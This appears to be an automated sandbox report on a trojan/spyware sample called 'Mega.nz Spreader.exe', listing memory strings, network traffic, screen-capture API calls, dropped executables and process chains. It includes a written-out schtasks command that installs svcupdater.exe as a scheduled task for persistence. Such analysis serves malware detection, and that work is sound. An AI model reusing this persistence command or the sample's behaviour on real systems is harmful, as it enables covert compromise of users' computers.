Source: lib.exe, 00000007.00000003.2075465060.0000026B4D9D1000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2064008323.0000026B4DF23000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2067488525.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077249450.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2075968258.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077640294.0000026B4DF49000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2081537469.0000026B4D9EF000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076861094.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2082286891.0000026B4DF4A000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2074018307.0000026B4DF15000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2061947765.0000026B4DF1D000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076697687.0000026B4DF2E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2063331817.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060050613.0000026B4D9E4000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2065651958.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060729690.0000026B4DF0E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077823055.0000026B4D9E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062263084.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062530738.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077548067.0000026B4D9E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: lib.exe, 00000007.00000003.2075465060.0000026B4D9D1000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2064008323.0000026B4DF23000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2067488525.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077249450.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2075968258.0000026B4DF1B000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077640294.0000026B4DF49000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2081537469.0000026B4D9EF000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076861094.0000026B4D9D2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2074018307.0000026B4DF15000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2061947765.0000026B4DF1D000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076697687.0000026B4DF2E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2063331817.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060050613.0000026B4D9E4000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2065651958.0000026B4DF14000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2060729690.0000026B4DF0E000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077823055.0000026B4D9E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062263084.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2062530738.0000026B4DF25000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2077548067.0000026B4D9E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: lib.exe, 00000007.00000002.2081774717.0000026B4DCB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: lib.exe, 00000007.00000002.2084707630.00007FF8A88BB000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: lib.exe, 00000007.00000003.2074697379.0000026B4E0E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2083307702.0000026B4FB28000.00000004.00001000.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2082984704.0000026B4E0F2000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2069569579.0000026B4E0E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076202808.0000026B4E0E7000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2076459074.0000026B4E0F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/royalleaks
Source: lib.exe, 00000007.00000002.2083307702.0000026B4FB28000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/royalleaksh__
Source: api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: api.exe, 00000003.00000003.2057014116.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, api.exe, 00000003.00000003.2054880295.0000000003C79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: lib.exe, 00000007.00000003.2057719232.0000026B4DF02000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2058100018.0000026B4DEC3000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2057579099.0000026B4DF00000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2081606147.0000026B4DA00000.00000004.00001000.00020000.00000000.sdmp, lib.exe, 00000007.00000003.2057579099.0000026B4DEC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: lib.exe, 00000007.00000002.2085170372.00007FF8A8958000.00000004.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.python.org/psf/license/

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\api.exe

Code function: 3_2_00DE0840 GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateStreamOnHGlobal,EnterCriticalSection,LeaveCriticalSection,GetObjectW,IStream_Size,IStream_Reset,IStream_Read,SelectObject,DeleteDC,ReleaseDC,DeleteObject,DeleteObject,DeleteObject,EnterCriticalSection,EnterCriticalSection,EnterCriticalSection,GdiplusShutdown,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,

3_2_00DE0840

System Summary

.NET source code contains very large strings

Source: leaf.exe.0.dr, Registro.cs	Long String: Length: 167423
Source: svcupdater.exe.9.dr, Registro.cs	Long String: Length: 167423

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\leaf.exe

File dump: svcupdater.exe.9.dr 659151360

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Code function: 1_2_0119C4D4	1_2_0119C4D4
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Code function: 1_2_0119DC60	1_2_0119DC60
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DDF190	3_2_00DDF190
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DCC940	3_2_00DCC940
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DFC2B0	3_2_00DFC2B0
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DF7265	3_2_00DF7265
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DD5310	3_2_00DD5310
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DF07C0	3_2_00DF07C0
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E17729	3_2_00E17729
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E018B0	3_2_00E018B0
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DE8AD0	3_2_00DE8AD0
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E08AB1	3_2_00E08AB1
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DF1BC0	3_2_00DF1BC0
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DEDD90	3_2_00DEDD90
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E0AE31	3_2_00E0AE31
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00DEFE20	3_2_00DEFE20
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E05F9A	3_2_00E05F9A
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75996FA88	5_2_00007FF75996FA88
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759974EA0	5_2_00007FF759974EA0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759975DEC	5_2_00007FF759975DEC
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF7599558E0	5_2_00007FF7599558E0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759966878	5_2_00007FF759966878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75997324C	5_2_00007FF75997324C
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759962A18	5_2_00007FF759962A18
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759970A34	5_2_00007FF759970A34
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759966878	5_2_00007FF759966878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75996D1F8	5_2_00007FF75996D1F8
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF7599621DC	5_2_00007FF7599621DC
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759960150	5_2_00007FF759960150
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75997511C	5_2_00007FF75997511C
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759968D00	5_2_00007FF759968D00
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759957420	5_2_00007FF759957420
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759978BE8	5_2_00007FF759978BE8
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759960354	5_2_00007FF759960354
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75996132C	5_2_00007FF75996132C
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF7599616C4	5_2_00007FF7599616C4
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF7599666C4	5_2_00007FF7599666C4
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759972DB0	5_2_00007FF759972DB0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759962614	5_2_00007FF759962614
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75996FA88	5_2_00007FF75996FA88
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75995FD40	5_2_00007FF75995FD40
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75996CD64	5_2_00007FF75996CD64
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759960560	5_2_00007FF759960560
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF7599758A0	5_2_00007FF7599758A0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF7599670FC	5_2_00007FF7599670FC
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75996D878	5_2_00007FF75996D878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759964FC0	5_2_00007FF759964FC0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF75995FF44	5_2_00007FF75995FF44
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759960764	5_2_00007FF759960764
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF7599621DC	7_2_00007FF7599621DC
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75996132C	7_2_00007FF75996132C
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759975DEC	7_2_00007FF759975DEC
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75997324C	7_2_00007FF75997324C
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759962A18	7_2_00007FF759962A18
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759970A34	7_2_00007FF759970A34
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75996FA88	7_2_00007FF75996FA88
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759966878	7_2_00007FF759966878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75996D1F8	7_2_00007FF75996D1F8
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759960150	7_2_00007FF759960150
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75997511C	7_2_00007FF75997511C
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759968D00	7_2_00007FF759968D00
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759957420	7_2_00007FF759957420
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759978BE8	7_2_00007FF759978BE8
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759960354	7_2_00007FF759960354
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF7599616C4	7_2_00007FF7599616C4
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF7599666C4	7_2_00007FF7599666C4
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759974EA0	7_2_00007FF759974EA0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759972DB0	7_2_00007FF759972DB0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759962614	7_2_00007FF759962614
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75996FA88	7_2_00007FF75996FA88
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75995FD40	7_2_00007FF75995FD40
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75996CD64	7_2_00007FF75996CD64
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759960560	7_2_00007FF759960560
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF7599758A0	7_2_00007FF7599758A0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF7599670FC	7_2_00007FF7599670FC
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF7599558E0	7_2_00007FF7599558E0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759966878	7_2_00007FF759966878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75996D878	7_2_00007FF75996D878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759964FC0	7_2_00007FF759964FC0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF75995FF44	7_2_00007FF75995FF44
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759960764	7_2_00007FF759960764
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B8F81060	7_2_00007FF8B8F81060
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B93C3200	7_2_00007FF8B93C3200
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B98427A0	7_2_00007FF8B98427A0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B9842ED0	7_2_00007FF8B9842ED0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B98439F0	7_2_00007FF8B98439F0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B98432E0	7_2_00007FF8B98432E0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B9843F50	7_2_00007FF8B9843F50
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B9841F50	7_2_00007FF8B9841F50
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B9F67778	7_2_00007FF8B9F67778
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF8B9F69620	7_2_00007FF8B9F69620
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 14_2_00BDC4D4	14_2_00BDC4D4
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 14_2_00BDDC60	14_2_00BDDC60
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_00ECAEA0	18_2_00ECAEA0
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_00ECC4D4	18_2_00ECC4D4
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_00ECDC60	18_2_00ECDC60
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_0535CE38	18_2_0535CE38
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05355AA1	18_2_05355AA1
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05352401	18_2_05352401
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05355400	18_2_05355400
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_053537A0	18_2_053537A0
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05355608	18_2_05355608
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05351641	18_2_05351641
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_053541B9	18_2_053541B9
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_053591E9	18_2_053591E9
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_053541C8	18_2_053541C8
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05355069	18_2_05355069
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_053553F1	18_2_053553F1
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05353200	18_2_05353200
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_053592B7	18_2_053592B7
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05350280	18_2_05350280
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_053532F0	18_2_053532F0
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05354D78	18_2_05354D78
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05354D69	18_2_05354D69
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05359FE0	18_2_05359FE0
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05350E00	18_2_05350E00
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_05353919	18_2_05353919
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_053558B8	18_2_053558B8
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_053558A9	18_2_053558A9
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 18_2_06D90E00	18_2_06D90E00
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 21_2_0125C4D4	21_2_0125C4D4
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 21_2_0125DC60	21_2_0125DC60

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\_MEI66002\VCRUNTIME140.dll A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\_MEI66002\_bz2.pyd EBCAC51449F323AE3AE961A33843029C34B6A82138CCD9214CF99F98DD2148C2

Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: String function: 00E10300 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: String function: 00007FF759951C50 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: String function: 00007FF759951CB0 appears 38 times

Source: unicodedata.pyd.5.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: Mega.nz Spreader.exe, 00000000.00000002.2038521099.00000000011BE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenamekaikoBF.exeF vs Mega.nz Spreader.exe

Source: Mega.nz Spreader.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@28/26@1/3

Source: C:\Users\user\AppData\Local\Temp\lib.exe

Code function: 5_2_00007FF759956670 GetLastError,FormatMessageW,WideCharToMultiByte,

5_2_00007FF759956670

Source: C:\Users\user\AppData\Local\Temp\leaf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\leaf.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_03
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4204:120:WilError_03

Source: C:\Users\user\Desktop\Mega.nz Spreader.exe

File created: C:\Users\user\AppData\Local\Temp\leaf.exe

Jump to behavior

Source: Mega.nz Spreader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Mega.nz Spreader.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Mega.nz Spreader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Mega.nz Spreader.exe

ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\Mega.nz Spreader.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_0-52

Source: unknown	Process created: C:\Users\user\Desktop\Mega.nz Spreader.exe "C:\Users\user\Desktop\Mega.nz Spreader.exe"
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Process created: C:\Users\user\AppData\Local\Temp\leaf.exe "C:\Users\user\AppData\Local\Temp\leaf.exe"
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Process created: C:\Users\user\AppData\Local\Temp\api.exe "C:\Users\user\AppData\Local\Temp\api.exe"
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Process created: C:\Users\user\AppData\Local\Temp\lib.exe "C:\Users\user\AppData\Local\Temp\lib.exe"
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Process created: C:\Users\user\AppData\Local\Temp\lib.exe "C:\Users\user\AppData\Local\Temp\lib.exe"
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process created: C:\Users\user\AppData\Local\Temp\leaf.exe "{path}"
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process created: C:\Users\user\AppData\Local\Temp\leaf.exe "{path}"
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: unknown	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe "{path}"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe "{path}"
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe "{path}"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Process created: C:\Users\user\AppData\Local\Temp\leaf.exe "C:\Users\user\AppData\Local\Temp\leaf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Process created: C:\Users\user\AppData\Local\Temp\api.exe "C:\Users\user\AppData\Local\Temp\api.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Process created: C:\Users\user\AppData\Local\Temp\lib.exe "C:\Users\user\AppData\Local\Temp\lib.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process created: C:\Users\user\AppData\Local\Temp\leaf.exe "{path}"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process created: C:\Users\user\AppData\Local\Temp\leaf.exe "{path}"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Process created: C:\Users\user\AppData\Local\Temp\lib.exe "C:\Users\user\AppData\Local\Temp\lib.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
